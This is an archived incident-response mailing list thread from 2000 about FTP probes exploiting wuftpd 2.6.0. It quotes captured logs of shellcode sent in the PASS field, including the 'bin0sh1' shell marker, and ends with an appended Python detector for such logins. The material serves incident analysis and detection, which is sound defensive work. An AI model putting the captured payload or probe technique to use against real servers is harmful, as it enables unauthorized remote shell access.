Security Incidents mailing list archives
Re: New or old FTP exploit?
From: Fredrik Ostergren <fredrik.ostergren () FREEBOX COM>
Date: Wed, 9 Aug 2000 20:56:22 -0000
Hi! I believe it's the "new" wuftpd2.6.0(1) exploit. I had the same attacks on a network and noticed the exact login functions using a sniffer; that "bin0sh1" is common for the "new" wuftpd exploit.

/ Fredrik Ostergren.

Our /16 has been scanned at least two times from different foreign addresses during the last weeks with an exploit that seems to be the same. On both occasions, the connections are to port 21 with the would-be intruder trying to log in as "USER ftp" and "PASS long-string-with-nops-and-shellcode-in-it".

From one of our users, I got the following log saved by sniffit:

> USER ftp
> USER ftp
> PASS 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^ C1ÉþÉ1À^°ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV° Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11
> PASS 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^Ff¹ÿÿ°'Í1À^°=Í1À1Û^ C1ÉþÉ1À^°ÍþÉuó1ÀF ^°=Íþ°0þÈF1ÀFvFóNV° Í1À1Û°Íèÿÿÿÿÿÿ0bin0sh1..11

Another user sent me this:

> Jul 22 05:47:16 yyyyy ftpd[11650]: ANONYMOUS FTP LOGIN FROM xxxxxxxxxxxxxxxxxxxx [xxx.xxx.xx.xx],
> 1À1Û1É° FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^H C^B1ÉþÉ1À^^H°^LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^H F^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11
> Jul 22 05:47:27 yyyyy ftpd[11650]: FTP session closed Jul 22 07:48:13

Could somebody please tell me if this is an old exploit for some FTP daemon, or a new exploit?

We have seen attacks coming from:

200.255.45.90 ppp50.cruiser.com.br
212.69.228.245 Legend Internet Ltd

--
Kent Engström, Linköping University Incident Response Team
kent () unit liu se
abuse () liu se
+46 13 28 1744
UNIT, Linköping University; SE-581 83 LINKÖPING; SWEDEN
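
Added example, not part of the original thread: a small Python check that flags captured FTP command lines matching the pattern described above (a PASS argument that is very long, mostly non-printable, or contains the "bin0sh1" string). The length and ratio thresholds and the sample lines are assumptions constructed for illustration; the filler bytes are inert placeholders.

```python
import re

MARKER = b"bin0sh1"      # string both posters report inside the PASS argument
MAX_PASS_LEN = 64        # assumed threshold: anonymous passwords are short e-mail addresses
MAX_BINARY_RATIO = 0.25  # assumed threshold for the share of non-printable bytes

PASS_RE = re.compile(rb"\s*PASS (.*)", re.S | re.I)


def suspicious_pass(line: bytes) -> list:
    """Return the reasons a captured FTP command line looks like the probe, or []."""
    m = PASS_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return []
    arg = m.group(1)
    reasons = []
    if MARKER in arg:
        reasons.append("marker")
    if len(arg) > MAX_PASS_LEN:
        reasons.append("long")
    nonprint = sum(1 for b in arg if b < 0x20 or b > 0x7E)
    if arg and nonprint / len(arg) > MAX_BINARY_RATIO:
        reasons.append("binary")
    return reasons


def scan(lines) -> list:
    """Return (line_number, reasons) for every flagged line, numbering from 1."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = suspicious_pass(line)
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample session: one normal anonymous login, one probe-shaped PASS
# (placeholder filler plus the reported marker), and one long but printable PASS.
SAMPLE = [
    b"USER ftp\r\n",
    b"PASS user@example.org\r\n",
    b"USER ftp\r\n",
    b"PASS " + b"\x90" * 80 + b"\xff\xff\xff0bin0sh1..11\r\n",
    b"PASS " + b"A" * 100 + b"\r\n",
]

if __name__ == "__main__":
    for lineno, reasons in scan(SAMPLE):
        print(f"line {lineno}: {', '.join(reasons)}")
```

The marker check alone is brittle, since the string can be changed; the length and non-printable checks catch the same shape of PASS argument without depending on it.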